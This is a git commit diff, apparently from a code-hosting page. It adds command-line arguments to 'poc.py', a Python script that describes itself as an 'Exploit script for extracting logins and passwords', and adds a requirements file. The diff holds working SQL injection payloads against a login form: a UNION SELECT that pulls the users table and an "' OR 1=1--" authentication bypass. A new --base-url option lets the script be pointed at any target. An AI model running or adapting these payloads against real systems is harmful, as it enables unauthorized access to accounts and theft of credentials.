added argparse for poc and requirements
This commit is contained in:
8
poc.py
Normal file → Executable file
8
poc.py
Normal file → Executable file
@@ -1,7 +1,13 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
import requests
|
import requests
|
||||||
import re
|
import re
|
||||||
|
import argparse
|
||||||
|
|
||||||
BASE_URL = "http://localhost:8000"
|
parser = argparse.ArgumentParser(description="Exploit script for extracting logins and passwords.")
|
||||||
|
parser.add_argument("--base-url", default="http://localhost:80", help="Base URL of the target application")
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
BASE_URL = args.base_url
|
||||||
|
|
||||||
login_payload = "' UNION SELECT login FROM users--"
|
login_payload = "' UNION SELECT login FROM users--"
|
||||||
form_data = {"login": login_payload, "password": "' OR 1=1--"}
|
form_data = {"login": login_payload, "password": "' OR 1=1--"}
|
||||||
|
|||||||
1
poc_recs.txt
Normal file
1
poc_recs.txt
Normal file
@@ -0,0 +1 @@
|
|||||||
|
requests
|
||||||
Reference in New Issue
Block a user